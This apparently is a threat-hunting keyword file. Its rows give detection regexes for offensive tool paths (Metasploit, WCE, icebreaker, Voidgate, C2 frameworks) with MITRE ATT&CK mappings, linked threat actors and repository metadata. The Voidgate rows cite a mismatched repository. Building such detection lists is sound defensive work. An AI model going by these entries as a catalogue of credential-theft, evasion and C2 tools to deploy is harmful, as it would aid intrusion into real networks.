"*/viperpython.git*",".{0,1000}\/viperpython\.git.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12454" "*/virtualenvs/icebreaker*",".{0,1000}\/virtualenvs\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","12455" "*/Virus Rat v*.exe*",".{0,1000}\/Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12456" "*/VirusTotalC2/*",".{0,1000}\/VirusTotalC2\/.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","12457" "*/VisualBasicObfuscator*",".{0,1000}\/VisualBasicObfuscator.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","12458" "*/vmauthd-brute.nse*",".{0,1000}\/vmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12459" "*/vmware_enum_*.rb*",".{0,1000}\/vmware_enum_.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12460" "*/vmware_vcenter_cve_2020_3952*",".{0,1000}\/vmware_vcenter_cve_2020_3952.{0,1000}","offensive_tool_keyword","POC","CVE-2020-3952 POC exploitation","T1190 - T1040 - T1059.001","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/guardicore/vmware_vcenter_cve_2020_3952","1","1","N/A","N/A","7","3","273","60","2020-04-16T08:38:42Z","2020-04-16T07:40:51Z","12461" "*/VMware-CVE-2022-22954*",".{0,1000}\/VMware\-CVE\-2022\-22954.{0,1000}","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","N/A","3","281","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z","12462" "*/vmware-version.nse*",".{0,1000}\/vmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12463" "*/vnc-brute.nse*",".{0,1000}\/vnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12464" "*/vncdll.*",".{0,1000}\/vncdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12465" "*/vncdll/*",".{0,1000}\/vncdll\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12466" "*/vncEncoder.*",".{0,1000}\/vncEncoder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12467" "*/VNCHooks*",".{0,1000}\/VNCHooks.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12468" "*/VNCHooks.*",".{0,1000}\/VNCHooks\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12469" "*/vnc-info.nse*",".{0,1000}\/vnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12470" "*/vnc-title.nse*",".{0,1000}\/vnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12473" "*/vnik_v1.c*",".{0,1000}\/vnik_v1\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12474" "*/Voidgate.exe*",".{0,1000}\/Voidgate\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","12475" "*/Voidgate.git*",".{0,1000}\/Voidgate\.git.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","12476" "*/voldemort-info.nse*",".{0,1000}\/voldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12477" "*/Volumiser.exe*",".{0,1000}\/Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12478" "*/Volumiser.git*",".{0,1000}\/Volumiser\.git.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12479" "*/Volumiser-maser.zip*",".{0,1000}\/Volumiser\-maser\.zip.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12480" "*/vpc__enum_lateral_movement*",".{0,1000}\/vpc__enum_lateral_movement.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for 
testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","12481" "*/vss-enum.py*",".{0,1000}\/vss\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12484" "*/vssenum/*",".{0,1000}\/vssenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","12485" "*/vtam-enum.nse*",".{0,1000}\/vtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12487" "*/vulners.nse*",".{0,1000}\/vulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12488" "*/vulnscan.yaml*",".{0,1000}\/vulnscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","12489" "*/vulnserver.py*",".{0,1000}\/vulnserver\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","12490" "*/vulscan.nse*",".{0,1000}\/vulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","12491" "*/vuze-dht-info.nse*",".{0,1000}\/vuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12492" "*/waf__enum/main.py*",".{0,1000}\/waf__enum\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","12493" "*/Wait_For_Command.ps1*",".{0,1000}\/Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","12494" "*/Waitfor-Persistence.git*",".{0,1000}\/Waitfor\-Persistence\.git.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12495" "*/Waitfor-Persistence.ps1*",".{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12496" "*/wapitiCore/*",".{0,1000}\/wapitiCore\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","12497" "*/wapiti-scanner/*",".{0,1000}\/wapiti\-scanner\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","12498" 
"*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12500" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12501" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12502" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12503" "*/wce.exe*",".{0,1000}\/wce\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","12504" "*/wce32.exe*",".{0,1000}\/wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - 
T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12505" "*/wce64.exe*",".{0,1000}\/wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12506" "*/wce-beta.zip*",".{0,1000}\/wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12507" 